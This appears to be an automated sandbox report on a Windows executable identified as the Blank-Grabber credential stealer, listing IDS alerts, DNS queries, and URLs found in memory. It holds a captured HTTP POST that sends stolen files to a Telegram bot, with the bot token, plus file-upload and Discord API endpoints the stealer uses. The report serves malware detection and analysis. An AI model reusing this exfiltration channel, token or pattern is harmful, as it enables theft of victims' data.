Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F192F0 FindFirstFileExW,FindClose,	0_2_00007FF6B9F192F0
Source: C:\Users\user\Desktop\mcgen.exe	Code function: 0_2_00007FF6B9F318E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF6B9F318E4
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CF46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	103_2_00007FF695CF46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695D388E0 FindFirstFileExA,	103_2_00007FF695D388E0
Source: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe	Code function: 103_2_00007FF695CEE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	103_2_00007FF695CEE21C

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49894 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2857751 - Severity 1 - ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST) : 192.168.2.6:49894 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2857752 - Severity 1 - ETPRO MALWARE SynthIndi Loader CnC Response : 149.154.167.220:443 -> 192.168.2.6:49894

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping localhost -n 3

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0
Source: global traffic	HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.3.0

Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: blank-q0y5l.in
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7770343182:AAFH0EKMbwNwFcAUN5qW8m0OzxUEjm5sVvs/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 727365User-Agent: python-urllib3/2.3.0Content-Type: multipart/form-data; boundary=15fc0aba29de58fbc6372618a4a7a3b7

Source: mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi
Source: mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi6
Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: mcgen.exe, 00000002.00000003.2248894895.000002C54EA53000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54EA53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: mcgen.exe, 00000002.00000002.2527940575.000002C54EA99000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2525115429.000002C54C787000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54E9A7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2526365039.000002C54E3D0000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2294771166.0000020A5B630000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2396696364.000001FC55B20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000B.00000002.2303077400.0000020A5B9AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000B.00000002.2303077400.0000020A5B9AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 0000003E.00000002.2398861499.000001FC55CF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: libffi-8.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: mcgen.exe, 00000002.00000003.2139230293.000002C54E45D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E950000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E9A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://google.com/mail/
Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E9A7000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545
Source: mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/json/?fields=225545r
Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hostingr
Source: powershell.exe, 0000000B.00000002.2277416389.0000020A53250000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2321464313.000001FC3F48A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2390633772.000001FC4DB97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2390633772.000001FC4DCD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: powershell.exe, 0000003E.00000002.2321464313.000001FC3F404000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 0000000B.00000002.2207068947.0000020A4340A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000B.00000002.2207068947.0000020A431E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2321464313.000001FC3DB21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000B.00000002.2207068947.0000020A4340A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: mcgen.exe, 00000002.00000002.2528946211.000002C54EF54000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 0000003E.00000002.2321464313.000001FC3F289000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000003E.00000002.2321464313.000001FC3F404000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: mcgen.exe, 00000000.00000003.2123373065.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2123286342.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000000.00000003.2122893326.0000024512160000.00000004.00000020.00020000.00000000.sdmp, libffi-8.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: mcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: powershell.exe, 0000000B.00000002.2303077400.0000020A5B9AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: powershell.exe, 0000000B.00000002.2207068947.0000020A431E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2321464313.000001FC3DB21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://allegro.pl/
Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/upload
Source: mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/uploadr%
Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServer
Source: mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServerr
Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7770343182:AAFH0EKMbwNwFcAUN5qW8m0OzxUEjm5sVvs/sendDocument
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F0D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7770343182:AAFH0EKMbwNwFcAUN5qW8m0OzxUEjm5sVvs/sendDocument0
Source: mcgen.exe, 00000002.00000002.2529086772.000002C54F120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000003E.00000002.2390633772.000001FC4DCD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000003E.00000002.2390633772.000001FC4DCD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000003E.00000002.2390633772.000001FC4DCD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: mcgen.exe, 00000000.00000003.2124193353.0000024512160000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v9/users/
Source: mcgen.exe, 00000002.00000002.2525937902.000002C54E1F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: mcgen.exe, 00000002.00000002.2526754701.000002C54E5D0000.00000004.00001000.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2129375159.000002C54E217000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.dr	String found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: mcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: mcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: mcgen.exe, 00000002.00000002.2525383234.000002C54E014000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: mcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: mcgen.exe, 00000002.00000002.2525383234.000002C54E014000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: mcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: mcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: mcgen.exe, 00000002.00000002.2525383234.000002C54DF90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: mcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: mcgen.exe, 00000002.00000003.2406611412.000002C54FADA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: mcgen.exe, 00000002.00000002.2528733144.000002C54ED10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: mcgen.exe, 00000002.00000002.2526906103.000002C54E6D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabber
Source: mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
Source: mcgen.exe, 00000002.00000003.2141893180.000002C54E540000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141838934.000002C54E522000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabberr%
Source: mcgen.exe, 00000002.00000003.2141215194.000002C54E544000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141280014.000002C54E521000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2140715336.000002C54E583000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2140947833.000002C54EBE0000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2141430894.000002C54E540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/BlankOBF
Source: powershell.exe, 0000003E.00000002.2321464313.000001FC3F404000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: mcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: mcgen.exe, 00000002.00000002.2525383234.000002C54E014000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: mcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: mcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: mcgen.exe, 00000002.00000002.2525937902.000002C54E1F3000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2144496528.000002C54E8F5000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2144379299.000002C54E955000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/issues/86361.
Source: mcgen.exe, 00000002.00000002.2528946211.000002C54EF54000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/importlib_metadata/wiki/Development-Methodology
Source: mcgen.exe, 00000002.00000002.2525937902.000002C54E190000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: mcgen.exe, 00000002.00000002.2528733144.000002C54ED10000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
Source: mcgen.exe, 00000002.00000002.2528946211.000002C54EF54000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
Source: mcgen.exe, 00000002.00000002.2528946211.000002C54EF54000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
Source: powershell.exe, 0000003E.00000002.2321464313.000001FC3E755000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: mcgen.exe, 00000002.00000003.2248894895.000002C54EACA000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527984225.000002C54EACA000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2272402532.000002C54EAC8000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000003.2407347267.000002C54EACA000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E7D0000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail
Source: mcgen.exe, 00000002.00000002.2527033643.000002C54E970000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://google.com/mail/
